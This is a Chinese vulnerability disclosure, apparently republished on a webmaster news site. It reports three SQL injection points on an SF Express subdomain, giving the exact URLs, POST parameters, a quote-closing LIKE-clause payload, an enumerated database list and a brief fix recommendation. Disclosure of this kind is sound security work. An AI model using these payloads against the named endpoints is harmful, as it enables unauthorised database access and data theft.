顺丰速运分站注入漏洞另外几个注入点下载

黑吧安全网

三个注入点：

1、

http://ows-dfppe.sf-express.com/ows-dfp/service_time!getCityByProvince.action

post参数：province=98605&lang=sc®ion=cn

注入参数:province=98605

注入方式:post

2、

http://ows-dfppe.sf-express.com/ows-dfp/service_time!getAreaByCity.action

post参数：_cityName=9860501&_lang=sc&_region=cn

注入参数:_cityName=9860501

注入方式:post

3、

http://ows-dfppe.sf-express.com/ows-dfp/service_time!getCountyByArea.action

post参数：_area=986030601&_lang=sc&_region=cn

注入参数:_area=986030601

注入方式:post

其实这几个注入点和我之前提交的都是同一种类型的，实际的sql语句都是形如select xx from xx where xx like '%%';

所以构造payload的时候闭合单引号和百分号后就可以为所欲为了：

_cityName=9860501%25' and 1=1 and '%25'='&_lang=sc&_region=cn

经测试都是和之前漏洞同一个数据库：

available databases [4]:

[*] information_schema

[*] mysql

[*] opencms

[*] test

修复方案：

过滤和参数化，注入点应该不止上面几个，全站都做一个检查把

上一篇： [公开漏洞]新浪分站某业务SQL注入

下一篇： CCTV某分站sql注射下载

当前位置：站长啦网站目录 » 站长资讯 » 站长新闻 » 漏洞预警 » 文章详细

顺丰速运分站注入漏洞另外几个注入点下载

修复方案：

推荐文章

推荐网站